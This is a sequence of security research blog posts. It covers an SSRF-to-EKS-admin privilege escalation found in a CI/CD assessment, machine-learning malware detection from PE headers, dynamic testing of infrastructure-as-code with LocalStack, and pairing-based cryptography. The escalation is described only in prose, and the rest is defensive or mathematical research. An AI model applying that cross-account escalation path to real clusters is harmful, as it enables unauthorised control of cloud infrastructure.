In our final story, NCC Group consultants were on an assessment in which they landed in the middle of the pipeline. They were able to port scan the infrastructure, which turned out to be a build pipeline. They found a number of applications with (as of then) unknown functionality. One of the applications was vulnerable to server-side request forgery (SSRF), and they were running on AWS EC2 instances. The AWS nodes had the ability to edit config maps that map an AWS user account to a role inside the cluster. It turned out that this didn’t check whether the cluster and the account were in the same AWS account. As a result, the consultants were able to specify another AWS account to control the clusters and had admin privileges on the Elastic Kubernetes Service (EKS) cluster.

Summary

CI/CD pipelines are complex environments. This complexity requires methodical & comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their CI/CD pipeline(s).

Fundamentally, a CI/CD pipeline is remote code execution, and must be configured properly.

As seen from above, most compromises have the following root causes or can be traced back to:

  • Default configurations
  • Overly permissive permissions and roles
  • Lack of security controls
  • Lack of segmentation and segregation

✇NCC Group Research

Machine Learning for Static Analysis of Malware – Expansion of Research Scope

By: Matt Lewis

Introduction

The work presented in this blog post is that of Ewan Alexander Miles (former UCL MSci student) and explores the expansion of scope for using machine learning models on PE (portable executable) header files to identify and classify malware. It is built on work previously presented by NCC Group, in conjunction with UCL’s Centre for Doctoral Training in Data Intensive Science (CDT DIS), which tackles a binary classification problem for separating malware from benignware [1]. It explored different avenues of data assessment to approach the problem, one of which was observations on PE headers.

Multiple models were compared in [1] for their performance in accurately identifying malware from a testing dataset. A boosted decision tree (BDT) classifier, using the library XGBoost, was found to be most performant, showing a classification accuracy of 98.9%. The PE headers of files, both malicious and benign, were pre-processed into inputs made available to the BDT; following this, the model’s hyperparameters were tuned to improve model accuracy. This same methodology was applied to other models and the results compared, also using the model precision, recall and area under the ROC curve for assessment.

Here, a ‘deep dive’ is conducted on the XGBoost BDT to assess certain features of its training method, along with the robustness and structure of its input datasets. Broken down into four key aspects, this entails studying:

  • Whether the model receives enough training statistics, or whether there is room for improvement when a larger dataset is used for training;
  • The importance of different PE header features in the model’s training;
  • Model performance with various sampling balances applied to the dataset (e.g. weighted heavily with malware);
  • Model robustness when trained on data originating from older or newer files (e.g. training with files from 2010, testing on files from 2018).

These all help to develop an understanding of the model’s ‘black box’ process and present opportunities for model improvement, or its adaptation to different problems. Model accuracy, precision, recall, training time and area under the ROC curve are used in its assessment, with explanations given as to the real outputs they present.

What are PE Headers?

PE stands for portable executable – these are files with extensions such as .exe, .dll and .sys. It is a common format for many programs on the Windows OS; in fact, most executable code on Windows is loaded in PE format, whether it be benign or malicious. In general, PEs encapsulate the information necessary for Windows to manage the executable code.

The PE structure is composed of headers and sections; the image below gives a full exploration of a PE:

PE Structure

In this analysis, only the header is of interest. It contains different fields of metadata that give an idea of what the entire file looks like. A couple of examples include ‘NumberOfSections’, which is self-explanatory, and the ‘TimeDateStamp’, which is supposed to reference the time of file creation (stored as seconds since the Unix epoch). The latter is used later as a critical element of this investigation.

PE Headers are commonly used in malware analysis [2] [3]. From a machine learning perspective, these PE Header fields can be extracted to form a dataset for model training. These fields form feature inputs for a model that can go on to perform binary classification – in this case, classifying the file as benignware or malware.

With malware sourced from the popular file sharing website VirusShare, alongside benign files extracted from Windows OS programs, such as Windows Server 2000, Windows Package Manager and Windows 10 itself, the PE header dataset was built. After performing a train-test split, the training dataset comprised 50564 files, with an approximate balance of 44% malware to 56% benignware. Likewise, the test dataset comprised 11068 files, with an approximate balance of 69% malware to 31% benignware. A total of 268 input features were used in the dataset, all extracted from the PE headers, with an encoded one-hot label ‘IsMalware’ used for prediction.

Precision vs. Recall vs. Accuracy

Before discussing XGBoost’s training and performance on this data, it is worth understanding what each model output represents in terms of what needs to be achieved. The assumed goal here is to be able to correctly identify malware from a set of unlabelled files consisting of both malware and benignware. People familiar with the machine learning process will know about confusion matrices, which can be used to graphically represent binary classification outcomes. A typical binary classification confusion matrix will look like this:

Binary classification confusion matrix

This matrix shows four outcomes side-by-side. True positives, where the model classifies malware as malware, are on the bottom right. True negatives, likewise, are on the top left, and represent the model classifying benignware as benignware. The objective of model improvement can be to reduce the other two outcomes – false negatives, where the model classifies malware as benign (bottom left) and false positive, where the model classifies benignware as malicious (top right). It is intuitive that the preferred outcome is reducing false negatives, where malware is classified as benign.

As such, multiple assessment metrics are used. Precision measures the number of true positives out of the total number of predicted positives:

Precision = TP / (TP + FP)

Thus, here, precision can be thought of as a measure of how many files are correctly labelled as malware out of all the files that are labelled malware. In an ideal world this is 100% – all the files labelled as malware are indeed malware.

What this doesn’t take into consideration is that the number of files labelled as malware might not be equal to the total number of malware files in the dataset! For example, if there are 100 malware and 100 benign files in the dataset and 60 are predicted to be malware, and these 60 are all actually malware, the model outputs 100% precision. However, in this case, it missed 40 malware files. Precision can therefore also be a measure of how much false positives have been reduced – high precision means a low false positive rate.

Recall is in some ways the opposite here, measuring the number of true positives out of the total number of malware files:

Recall = TP / (TP + FN)

So recall is essentially the percentage of malware files labelled correctly. On the other hand, what this doesn’t account for is the false positive rate. Assume there are again 100 malware and 100 benign files in the dataset and 120 are predicted to be malware. These 120 files cover all 100 malware files and 20 benign files. As all malware files are correctly labelled, the model recall is 100%, but it doesn’t register the fact that 20 benign files have been incorrectly labelled as malware. Recall can therefore also be a measure of how much false negatives have been reduced – high recall means a low false negative rate.

Accuracy is less relevant as it doesn’t reflect the dataset’s balance:

Accuracy = (TP + TN) / (TP + TN + FP + FN)

Essentially it answers, ‘how often is the prediction correct?’. Now assume a dataset of 10 benign files and 90 malware files. Predicting they are all malware gives an accuracy of 90%, which is very misleading because it completely disregards the benign files.

Knowing what these represent and co-ordinating that with the overall goal is important. If the main goal is to correctly label all malware, it could be assumed that it is acceptable (with a high enough precision) to incorrectly label benignware as malware rather than the other way around. This is a ‘better safe than sorry’ approach, where more research can be done on the false positives afterward. In this circumstance, a higher recall is favoured, reducing the number of malware files falsely labelled as benignware – the false negatives.

Training Statistics

After first training a model and receiving the initial results, something worth investigating almost immediately is the dataset size. Are there enough training statistics for the model to output the best possible results, or might the model benefit from more data to train on?

This can be examined by varying the number of training statistics fed to the model, while keeping the test dataset the same. As the model is fed more and more data in each successive training, its performance is assessed. If a plateau is seen, then that means feeding the model a larger training dataset may be making no difference.

The XGBoost model already established in [1], using an even larger dataset than that described above, produced the following performance:

Metric     Result (fraction, not %)
Accuracy   0.978
Recall     0.980
Precision  0.970

The first objective was to show that the model could be as performant with the newer, slightly smaller dataset. Following this, the dataset was randomly under-sampled to continuously smaller sizes, with the model performance evaluated at each point. Specifically, the dataset was reduced to 0.1% of its original size, with this incremented by 0.1% intervals until it was 1% of the original size. Following this, it was increased to 2% of its original size, and incremented in 2% intervals until eventually 100% of the dataset was trained on. The results are shown below:

Accuracy

Here, the metric accuracy is used, as it is sufficient to give a blanket idea of model performance. A plateau begins to form when only 20% of the training statistics are used, and it is certain that by a dataset size of 50%, very little increase in performance is achieved by using more data. Remember that only the training dataset is reduced in size, with the model testing on the full 11068 files at each stage.

This confirmed that the model was being fed more than enough training statistics and that, in fact, there was room for training time improvement by reducing the dataset size while bearing only a very small reduction in performance. It also set a baseline that for future analyses, at least 20% of the data should be used when downsampling, to avoid bias in the results from lack of training statistics.
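For reference, the sweep described above can be reproduced in a few lines with the scikit-learn-compatible XGBoost API; X_train, y_train, X_test and y_test are assumed stand-ins for the pre-split PE-header feature matrices and labels (as numpy arrays):

import numpy as np
from sklearn.metrics import accuracy_score
from xgboost import XGBClassifier

fractions = np.concatenate([np.arange(0.001, 0.011, 0.001),   # 0.1% .. 1%
                            np.arange(0.02, 1.01, 0.02)])     # 2% .. 100%
accuracy_by_fraction = {}
for frac in fractions:
    n = max(1, int(len(X_train) * frac))
    idx = np.random.choice(len(X_train), size=n, replace=False)  # random undersample
    model = XGBClassifier().fit(X_train[idx], y_train[idx])
    # the test set is never reduced: always the full 11068 files
    accuracy_by_fraction[frac] = accuracy_score(y_test, model.predict(X_test))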

There is still room for improvement on these findings: all metrics (precision, recall) should be examined in future. Furthermore, the dataset could be proportionately sampled to maintain the malware/benign balance, or alternatively different balances should be applied in conjunction with the downsampling.

Feature Importance

To this point, the training dataset comprised files with 268 input features, all extracted from the PE headers. The next aspect of the training worth testing was whether all of these features were necessary to produce a high-performing model, and what effect removing some of them would have on the training.

A ‘recursive drop’ method was used to implement these tests. The model was trained using all 268 input features, then each input feature was ranked using an attribute provided by the scikit-learn library, called feature_importances_. It ranks the input features by ‘the mean and standard deviation of accumulation of the impurity decrease within each tree’; more information can be found by reading the documentation [4].

Following this, the two least important features were dropped from the dataset and training was conducted using the set now comprising 266 features. All features were kept in the testing dataset. This was repeated, reducing the number of features by 2 each time, until only 2 features were trained on. The model was evaluated each time a new set of features was implemented. The precision, recall and accuracy all presented similar results:

Precision, Recall and Accuracy
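A condensed sketch of the recursive-drop loop just described might look as follows; X_train and X_test are assumed pandas DataFrames of the PE-header features, with y_train and y_test the corresponding label vectors:

from sklearn.metrics import accuracy_score, precision_score, recall_score
from xgboost import XGBClassifier

features = list(X_train.columns)
scores = {}
while len(features) >= 2:
    model = XGBClassifier().fit(X_train[features], y_train)
    # the test set itself is unchanged; the model reads only the retained columns
    preds = model.predict(X_test[features])
    scores[len(features)] = (accuracy_score(y_test, preds),
                             precision_score(y_test, preds),
                             recall_score(y_test, preds))
    # rank the features and drop the two least important before the next round
    ranked = sorted(zip(model.feature_importances_, features))
    features = [name for _, name in ranked[2:]]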

The above results show that an alarmingly small number of features can be used in model training to still achieve essentially the same performance, with about 30 input features appearing almost as performant. The feature names were registered at each stage of the recursive drop; as such, the 30 most relevant input features are known to be (ordered left-to-right, moving down):

Magic MajorLinkerVersion MinorLinkerVersion
SizeOfUninitializedData ImageBase FileAlignment
MajorOperatingSystemVersion MajorImageVersion MinorImageVersion
MajorSubsystemVersion SizeOfImage SizeOfHeaders
CheckSum SubSystem DllCharacteristics
SizeOfStackReserve SizeOfHeapReserve NumberOfSections
e_cblp e_lfanew SizeOfRawData0
Characteristics0 Characteristics1 Misc2
Characteristics2 Misc3 Characteristics3
Characteristics4 Characteristics5 BaseOfData

A conclusion to be drawn from these evaluations is that these features from the PE header files exhibit the most significant differences between malicious and benign files. However, further research should be conducted into these header features individually, or alternatively the same recursive drop method should be investigated with random features dropped each time.

A more interesting observation drawn from this was the effect on model training time, which may uncover a little about the nature of XGBoost’s black box functions:

Effect on model training time

It is visible that the training time using XGBoost decreases in an almost perfectly linear fashion with a reduction of input features. This indicates a strong element of XGBoost’s learning process comes from its looping over input variables, with less time spent looping over fewer inputs. Further investigation here, possibly studying how XGBoost responds to random numbers of inputs and its training time proportionality, is necessary.

Another method of evaluating a model’s performance is the receiver operating characteristic (ROC) curve, which presents the true positive rate as a function of the false positive rate. As the area under an ROC curve tends toward 1, the model is said to be performing better, as it can achieve a very high true positive rate for a very small false positive rate.

A direct comparison of the model using all 268 features with the model using only the 30 above can be made by plotting both ROC curves, which is shown below:

ROC Curve Model Comparison

It is clear there is very little difference to be seen between the original (268 feature) XGBoost and the simplified (30 feature) XGBoost. This suggests a massive reduction in training time for very little performance decay.

Dataset Balancing

Machine learning models are known to prioritise identification of different classes when the training dataset is balanced differently [5]. To identify any bias present in the model’s performance, the balance of the dataset was also evaluated. As this was a binary classification problem, achieving a specific dataset balance could be achieved by simply downsampling either the malware or the benignware in the test dataset.

To achieve the desired balance in the dataset, either class was downsampled according to the following equations:

M_sampled = B * RM / (1 - RM)   (when downsampling malware)
B_sampled = M * (1 - RM) / RM   (when downsampling benignware)

Where M and B are the raw numbers of the malware and benign samples respectively, and RM is the ‘malware ratio’, i.e. the fraction of malware in the resulting dataset, given by:

RM = M / (M + B)

The constraint was also placed that the dataset could not be sampled down to lower than 20% of its original size, as this would re-introduce bias due to lack of training statistics.

Model precision and recall were evaluated after training on increasing amounts of malware present in the dataset; beginning at a balance of 10% malware/90% benignware, the balance of malware was increased in 5% intervals (with the model evaluated each time) up to a dataset formed of 100% malware. The results are below:

Model Precision & Recall

No balance was applied to the test dataset. The graphs above support the conclusion that recall improves in favour of high malware content, meaning the model learns more about how to identify malware from a high balance of it. On the opposing side, the model learns more about how to identify benignware when there is a high balance of benign in the dataset, leading to high precision at low malware content.

The most important conclusion to draw is that this can be used as a tool. By applying specific balances to the training dataset (maintaining enough statistics notwithstanding), a model can be specifically tailored to precision or recall. Again, this will be dependent on the overall goal; a suggestion of this study would be high amounts of malware contributing to a higher recall.

Time Testing

The final aspect of study for this investigation was the effect of selecting training files from a specific time period, to test on newer data. This attempts to yield an understanding of the model’s robustness with time – if it is trained on older data but tested on newer data, is it just as performant? If not, how quickly does it become obsolete, and how often will these models need to be updated and maintained?

The main caveat to the methodology here is that files were selected based on their ‘TimeDateStamp’ header, which should indicate the creation time of the file. This presented two issues:

  • This input feature can be modified, falsified, or corrupted
  • This input feature can accidentally default to the incorrect datetime

Files dated to the Windows 7 release were a common occurrence, although it is expected some portion of them are incorrect; this was noted in [1]. As such, there is certainly an avenue for improvement on this section for future analyses.

Continuing with this method, further cuts were made in an attempt to improve the dataset. Files dated prior to 2000 were removed, as many had suspicious stamps (e.g. dated to the epoch, 1 Jan 1970, 0x0) and in total they made up a very small fraction of the files. Following this, a split was made such that test files were dated between 2019-2021, and training files initially spanned 2000-2010.

Following this, an ‘expanding window’ method was used. Initially, the model was trained on files from between 2000-2010, tested on files from 2019-2021, and evaluated. Following this, the training set expanded to 2000-2011, and so on until the full training dataset reached years spanning 2000-2018. Note, the test dataset never changed, and no specific balance was applied to either dataset. The results are below:

Recall & Precision

Firstly, note the y-axis on the precision graph – the precision changes nowhere near as much as the recall, which declines by around 5% per year on average. The likely reason that the precision changes at all is the introduction of more malware in the later-dated files. What this unfortunately indicates is that the model will not remain effective for very long; it may need maintaining and updating with new data every year to stay relevant.
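To make the expanding-window loop concrete, a minimal sketch is below, assuming a DataFrame with one row per PE file, a year column derived from the TimeDateStamp header, a binary malware label and a list of feature columns (all names here are illustrative):

import pandas as pd
import xgboost as xgb
from sklearn.metrics import precision_score, recall_score

def expanding_window(df, features):
    # Fixed test set: files dated 2019-2021; the training window grows yearly.
    test = df[df["year"].between(2019, 2021)]
    results = []
    for end in range(2010, 2019):  # 2000-2010, 2000-2011, ..., 2000-2018
        train = df[df["year"].between(2000, end)]
        model = xgb.XGBClassifier(eval_metric="logloss")
        model.fit(train[features], train["malware"])
        preds = model.predict(test[features])
        results.append({"train_end": end,
                        "precision": precision_score(test["malware"], preds),
                        "recall": recall_score(test["malware"], preds)})
    return pd.DataFrame(results)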

Conclusion

The findings above can contribute to building a more refined model for a specific purpose when it comes to malware identification via PE headers. Overall, a better understanding of XGBoost’s ability in this domain has been presented, with a slightly deeper dive into what can improve the model’s performance even further.

Although it has been established that the full 60,000-strong dataset is not strictly necessary, it generally makes sense to feed models as much data as possible. However, knowing how dataset balancing affects precision and recall allows the user to shift model performance in line with their goals. Furthermore, training time can be vastly reduced by including only the 30 input features listed above.

Further investigation should be made into the feature breakdown, examining why the 30 features listed provide just as much performance, and whether it is those features specifically or whether a set of 30 random features would do just as well. Data balancing should also be considered for the time testing, and it may be worth sourcing more training samples from 2000 onward to further remove any biases caused by a lack of training statistics.

Acknowledgements

Firstly, I would like to thank the whole of NCC Group for providing the opportunity to tackle this project. In conjunction, I would like to thank UCL’s Centre for Doctoral Training in Data Intensive Science for selecting me for the placement. From it I take away invaluable experience using new technologies, such as AWS EC2 instances and VMs, getting to grips with ML via the CLI and generally expanding my skills in model evaluation. Explicit thanks go to Tim Scanlon, Matt Lewis and Emily Lewis for help at different phases of the project!

Written by Ewan Alexander Miles.

References

[1] E. Lewis, T. Mlinarevic, A. Wilkinson, Machine Learning for Static Malware Analysis. 10 May 2021. UCL, UK.

[2] E. Raff, J. Sylvester, C. Nicholas, Learning the PE Header, Malware Detection with Minimal Domain Knowledge. 3 Nov 2017. New York, NY, USA.

[3] Y. Liao, PE-Header-Based Malware Study and Detection. 2012. University of Georgia, Athens, GA.

[4] Scikit-learn. Feature importance with a forest of trees. Accessed 6 Dec 2021.

[5] M. Stewart. Guide to Classification on Imbalanced Datasets. 20 Jul 2020. Towards Data Science.

✇NCC Group Research

Testing Infrastructure-as-Code Using Dynamic Tooling

By: Erik Steringer


Overview

TL;DR: Go check out https://github.com/ncc-erik-steringer/Aerides

As public cloud service consumption has grown, engineering and security professionals have responded with different tools and techniques to achieve security in the cloud. As a consultancy, we at NCC Group have published multiple tools that we use to guide testing and identify risks for our clients.

In recent years, these cloud providers as well as other companies have also provided infrastructure-as-code (IaC) solutions to manage infrastructure and set up environments. IaC allows cloud customers to write code that represents the infrastructure they want to deploy with a cloud provider. Rather than depending on a cloud engineer to create infrastructure piece-by-piece and without documentation, IaC allows engineers to produce reusable code. This centralizes the process of building and deploying infrastructure and prevents entire classes of risks.

One key benefit of IaC is the ability to perform analysis of the code to identify risks in the infrastructure before the infrastructure is deployed. For example, if an engineer writes code that creates an Amazon S3 bucket with a bucket policy, it is possible to pull the contents of the bucket policy and then look for risks such as making the bucket world-readable.
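As a minimal sketch of such a static check (the policy document and helper below are illustrative, not taken from any particular tool), one could parse a rendered bucket policy and flag statements that apply to every principal:

import json

def world_readable_statements(policy_json):
    # Return any Allow statements that grant access to all principals ("*").
    findings = []
    for stmt in json.loads(policy_json).get("Statement", []):
        principal = stmt.get("Principal")
        if stmt.get("Effect") == "Allow" and (
                principal == "*" or
                (isinstance(principal, dict) and principal.get("AWS") == "*")):
            findings.append(stmt)
    return findings

policy = """{"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-bucket/*"}]}"""
print(world_readable_statements(policy))  # flags the world-readable statement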

Static Tools

Much like in the Application Security space, we can classify Cloud Security tools as either static or dynamic. Static tools interpret and analyze code, rather than pulling data from a cloud provider. Static tools easily integrate with practices such as continuous integration and continuous deployment. Engineers can write security or policy-as-code checks that run each time someone commits changes. This can prevent high-severity misconfiguration issues from affecting deployed infrastructure.

Figure 1 – Static Analysis Methodology

Dynamic Tools

Dynamic tools, such as ScoutSuite, interact with a cloud provider to pull data, then interpret and analyze that data to identify risks. This means catching risks in the current state of the infrastructure, rather than in the intended design and desired state. Engineers can write security and policy-as-code checks that run periodically or after deployments. Dynamic tools, as they currently stand, cannot identify risks before deployments. But they can find risks that static tools cannot identify, such as risks created from resource configuration drift, or independent deployments of IaC to a common account/subscription/project of a cloud provider.

The Best of Both Worlds?

Beyond the universal limitations, cloud security tools that identify risks deeper than misconfigurations (graph-based analysis of IAM or network access controls, such as with PMapper [1], CloudMapper [2], and Cartography [3]) are dynamic rather than static. This means we miss out on the value these tools bring unless we invest the time to build interpreters for the different ways that people can write infrastructure-as-code.

However, there is a project designed specifically for continuous integration and testing called LocalStack [4] that sets up a mock AWS API endpoint. By using LocalStack, it is possible to take dynamic tools and use them like static tools by pointing them at the emulated AWS API. It should also be possible to take test cases from normal dynamic testing and port them to the IaC testing.

Figure 2 – Dynamic Analysis Methodology

Demonstration

Today, we are releasing a project called Aerides. This project demonstrates how to integrate LocalStack and dynamic tools for assessing IaC. Aerides includes mock infrastructure for a web service that is written using Terraform’s HCL. It is hosted on GitHub and uses GitHub Actions to perform automatic tests for pull requests.

Clone the repository ( https://github.com/ncc-erik-steringer/Aerides ) onto your machine and install its dependencies. Navigate into the Aerides/infracode directory and run:

# this will take ~30s to spin up
localstack start -d 

terraform init

terraform apply -var "acctid=000000000000"

This will launch LocalStack (daemon mode) and deploy the Terraform code. Now it is possible to run commands and see the mock infrastructure. For example:

# set fake access keys, set default region to us-east-1
aws configure --profile localstack
aws iam list-users \
--profile localstack \
--endpoint-url http://localhost:4566

Run PMapper against LocalStack like so:

pmapper --profile localstack graph create \
--localstack-endpoint http://localhost:4566 \
--exclude-services autoscaling

# should output 000000000000.svg if graphviz is installed
pmapper --account 000000000000 visualize 
Figure 3 – PMapper Visualization of Infra-as-Code

In the repository, there are currently four pull requests that demonstrate different types of risks that can be detected before deployment. The GitHub Actions that run the tests are hosted in the same repository. The test cases are written with Python’s `unittest` framework and show how you can programmatically handle the data generated by these tools.
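As a sketch of what such a test case might look like (the report filename and JSON structure below are hypothetical; the real Aerides tests differ), assume a previous CI step dumped a dynamic tool’s findings to JSON:

import json
import unittest

class BucketPolicyTests(unittest.TestCase):
    def test_no_world_readable_buckets(self):
        # report.json: a list of {"resource": ..., "world_readable": bool}
        with open("report.json") as fh:
            findings = json.load(fh)
        offenders = [item["resource"] for item in findings if item["world_readable"]]
        self.assertEqual(offenders, [], f"world-readable buckets: {offenders}")

if __name__ == "__main__":
    unittest.main()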

How to Build Continuous Integration with LocalStack

Although the noted repository is using GitHub with GitHub Actions, it is possible to use the same technique with other CI solutions. To generalize the process:

  1. Download the repository source
  2. Install dependencies including Terraform and LocalStack, as well as any other dynamic tools to use for testing (note, with solutions that support this option, it might be wise to create an image that has these dependencies installed and ready to go rather than install them every time you execute this process)
  3. Initialize LocalStack and allow it to run in the background throughout the remainder of the process (`-d` parameter)
  4. Initialize Terraform
  5. Use Terraform to apply the IaC to the running instance of LocalStack
  6. (Depending on the dynamic tools used) Initialize mitmproxy and allow it to run in the background throughout the remainder of the process
  7. Run dynamic tools to gather data from LocalStack, using the proxy when necessary
  8. Run test cases against the data gathered from the dynamic tools (see the testcode folder)
Figure 4 – The general CI processes for this technique

Advantages and Disadvantages

The technique we demonstrate in Aerides does include tradeoffs. It wholly hinges on LocalStack. Any delta between LocalStack’s API and the actual AWS APIs leads to unexpected behavior in dynamic tools. This ranges from errors/exceptions in the tools to false negatives/positives in the reporting. When trying to use different dynamic tools, we ran into several instances of these issues. We can help mitigate this disadvantage by making contributions to LocalStack and its underlying dependencies (i.e. Moto [6]). As LocalStack improves, these gaps can be reduced and the signals from dynamic cloud security tools become clearer.

Additionally, LocalStack covers a wide range of services from AWS and can mock several of the resources they make available. However, not all services/resources are available, and some are only available through LocalStack’s premium offering. This means there will be coverage gaps, and engineers trying to use LocalStack will need to adjust their templates to accommodate them.

However, the biggest benefit from utilizing LocalStack is speed. The actual process of standing up LocalStack, deploying the infrastructure-as-code, running dynamic tools, and running test cases altogether takes around thirty seconds for a small project with a few test cases. It can also be executed from an engineer’s development device rather than in CI processes. This is far faster than committing changes to a repository, then waiting for those changes to get picked up and deployed to a cloud provider (such as in a test/dev account/subscription/project), then executing the gathering/testing processes. This speedup scales with the number of resources (due to the number of HTTP requests made over the Internet versus via loopback). This is a nicer experience compared to pushing a change, then finding out a half-hour later that it created a major vulnerability in a live cloud environment.

References

  1. https://github.com/nccgroup/PMapper
  2. https://github.com/duo-labs/cloudmapper
  3. https://github.com/lyft/cartography
  4. https://localstack.cloud/
  5. https://github.com/toniblyx/my-arsenal-of-aws-security-tools
  6. https://github.com/spulec/moto

✇NCC Group Research

Estimating the Bit Security of Pairing-Friendly Curves

By: Giacomo Pope

Introduction

The use of pairings in cryptography began in 1993, when Menezes, Okamoto and Vanstone described what is now known as the MOV-attack: a sub-exponential algorithm for solving the discrete logarithm problem for supersingular elliptic curves.1 It wasn’t until the following decade that efficient pairing-based algorithms were used constructively to build cryptographic protocols applied to identity-based encryption, short signature signing algorithms and three participant key exchanges.

These protocols (and many more) are now being adopted and implemented “in the wild”.

Pairing-based protocols present an interesting challenge. Unlike many cryptographic protocols which perform operations in a single cryptographic group, pairing-based protocols take elements from two groups and “pair them together” to create an element of a third group. This means that when considering the security of a pairing-based protocol, cryptographers must ensure that any security assumptions (e.g. the hardness of the discrete logarithm problem) apply to all three groups.

The growing adoption of pairing-based protocols has inspired a surge of research interest in pairing-friendly curves: a special class of elliptic curves suitable for pairing-based cryptography. In fact, all current practical implementations of pairing-based protocols use these curves. As a result, understanding the security of pairing-friendly curves (and their associated groups) is at the core of the security of pairing-based protocols.

In this blogpost, we give a friendly introduction to the foundations of pairing-based protocols. We will show how elliptic curves offer a perfect space for implementing these algorithms and describe at a high level the cryptographic groups that appear during the process.

After a brief review of how we estimate the bit security of protocols and the computational complexity of algorithms, we will focus on reviewing the bit-security of pairing-friendly curves using BLS-signatures as an example. In particular, we collect recent results in the state-of-the-art algorithms designed to solve the discrete logarithm problem for finite fields and explain how this reduces the originally reported bit-security of some of the curves currently in use today.

We wrap up the blogpost by discussing the real-world ramifications of these new attacks and the current understanding of what lies ahead. For those who wish to hold true to (at least) 128 bit-security, we offer references to new pairing-friendly curves which have been carefully generated with respect to the most recent research.

This blogpost was inspired by some previous work that NCC Group carried out for ZCash, which in part discussed the bit-security of the BLS12-381 curve. This work was published as a public report.

Maths Note: throughout this blog post, we will assume that the reader is fairly comfortable with the notion of a mathematical group, finite fields and elliptic curves. For those who want a refresher, we offer a few lines in an Appendix: mathematical notation.

Throughout this blog post, we will use p to denote a prime and q = p^m, \; m > 0, to denote a prime power. It follows that \mathbb{F}_p is a prime field, and \mathbb{F}_{q} is a prime-power field. We allow m = 1 so we can use \mathbb{F}_{q} when we wish to be generic. When talking about pairing elements, we will use the notation \mathbb{F}_{p^k} such that the embedding degree k is explicit.

Acknowledgements

Many thanks to Paul Bottinelli, Elena Bakos Lang and Phillip Langlois from NCC Group, and Robin Jadoul in personal correspondence for carefully reading drafts of this blog post and offering their expertise during the editing process.

Bilinear Pairings and Elliptic Curves

Pairing groups together

At a high level, a pairing is a special function which takes elements from two groups and combines them together to return an element of a third group. In this section, we will explore this concept, its applications to cryptography and the realisation of an efficient pairing using points on elliptic curves.

Let G_1, G_2 and G_T be cyclic groups of order r. For this blog post, we will assume an additive structure for G_1 and G_2 with elements P, Q and a multiplicative structure for the target group G_T. A pairing is a map: e : G_1 \times G_2 \to G_T which is:

  • Bilinear: e([a]P, [b]Q) = e(P,Q)^{ab}.
  • Non-degenerate: If P is non-zero, then there is a Q such that e(P,Q) \neq 1 (and vice-versa).

In the special case when the input groups G_1 = G_2, we say that the pairing is symmetric, and asymmetric otherwise.

From a practical perspective, let’s look at an example where we can use pairings cryptographically. Given a group with an efficient pairing e(\cdot, \cdot), we can use bilinearity to easily solve the decision Diffie-Hellman problem.2 Using a symmetric pairing, we can write

e([a]P, [b]P) = e(P,P)^{ab}, \qquad e(P, [c]P)= e(P,P)^c.

Therefore, given the DDH triple ([a]P, [b]P, [c]P), we can solve DDH by checking whether

e([a]P, [b]P) \stackrel{?}{=} e(P, [c]P),

which will be true if and only if c = ab.
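A runnable sketch of this check using the py_ecc library’s BLS12-381 pairing is below; note that py_ecc’s pairing is asymmetric, so we verify the analogous relation e([a]g_1, [b]g_2) = e(g_1, [ab]g_2) rather than the symmetric version written above:

from py_ecc.bls12_381 import G1, G2, curve_order, multiply, pairing

a, b = 12345, 67890
c = (a * b) % curve_order  # a valid DDH triple has c = ab

# py_ecc's pairing takes its G2 argument first.
lhs = pairing(multiply(G2, b), multiply(G1, a))  # e([a]g1, [b]g2) = e(g1, g2)^(ab)
rhs = pairing(multiply(G2, c), G1)               # e(g1, [c]g2)   = e(g1, g2)^c
assert lhs == rhs  # equal precisely when c = ab (mod r)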

Pairing Points

🤓 The next few sections have more maths than most of the post. If you’re more keen to learn about security estimates and are happy to just trust that we have efficient pairings which take points on elliptic curves and return elements of \mathbb{F}^*_{p^k}, you can skip ahead to What Makes Curves Friendly? 🤓

Weil Beginnings

As the notation above may have hinted, one practical example of a bilinear pairing is when the groups G_1 and G_2 are generated by points on an elliptic curve. In particular, we will consider elliptic curves defined over a finite field: E(\mathbb{F}_q). We have a handful of practical bilinear pairings that we could use, but all of them take points on curves as an input and return an element of the group \mathbb{F}^*_{p^k}.

The first bilinear pairing for elliptic curve groups was proposed in 1940 by André Weil, and it is now known as the Weil pairing. Given an elliptic curve E(\mathbb{F}_q) with a cyclic subgroup G of order r, the Weil pairing takes points in the r-torsion E(\mathbb{F}_{p^k})[r] and returns an rth root of unity in \mathbb{F}^*_{p^k} for some integer k \geq 1.3

The r-torsion of the curve is the group E(\mathbb{F}_{q})[r] which consists of all the points on the curve whose order divides r: E(\mathbb{F}_{q})[r] = \{P \; | \; rP = \mathcal{O} , P \in E(\mathbb{F}_q) \}. The integer k appearing in the target group is called the (Weil) embedding degree and is the smallest integer k such that E(\mathbb{F}_{p^k})[r] has r^2 elements.4

To compute the value of the Weil pairing, you first need to be able to compute rational functions f_P and f_Q with a prescribed divisor.5 The Weil pairing is the quotient of these two functions:

e: E(\mathbb{F}_{p^k})[r] \times E(\mathbb{F}_{p^k})[r] \to \mathbb{F}^*_{p^k}, \qquad e(P,Q) = \frac{f_P(\mathcal{D}_Q)}{f_Q(\mathcal{D}_P)},

where the rational function f_S has divisor r(S) - r(\mathcal{O}) and \mathcal{D}_S is the divisor (S) - (\mathcal{O}), for a point on the curve S \in E(\mathbb{F}_{p^k}).

When Weil first proposed his pairing, algorithms to compute these special functions ran in exponential time in r, so computing the pairing for a cryptographically sized curve was infeasible.

It wasn’t until 1986, when Miller introduced his linear time algorithm to compute functions on algebraic curves with given divisors, that we could think of pairings in a cryptographic context. Miller’s speed-up can be thought of in analogy to how the “Square and Multiply” method speeds up exponentiation, and takes \log(r) steps. Similar to “Square and Multiply”, the lower the Hamming weight of the order r, the faster Miller’s algorithm runs. For a fantastic overview of working with Miller’s algorithm in practice, we recommend Ben Lynn’s thesis.

Tate and Optimised Ate Pairings

The Weil pairing is a natural way to introduce elliptic curve pairings (both historically and conceptually), but as Miller’s algorithm must be run twice to compute both f_P and f_Q, the Weil pairing can affect the performance of a pairing based protocol.

In contrast, Tate’s pairing t(\cdot, \cdot) requires only a single call to Miller’s algorithm and can be computed from

t(P, Q) = f_P(\mathcal{D}_Q)^{\frac{p^k-1}{r}},

leading to more efficient pairing computations. We can relate the Weil and Tate pairings by the relation:

e(P,Q)^{\frac{p^k-1}{r}} = \frac{t(P,Q)}{t(Q,P)}.

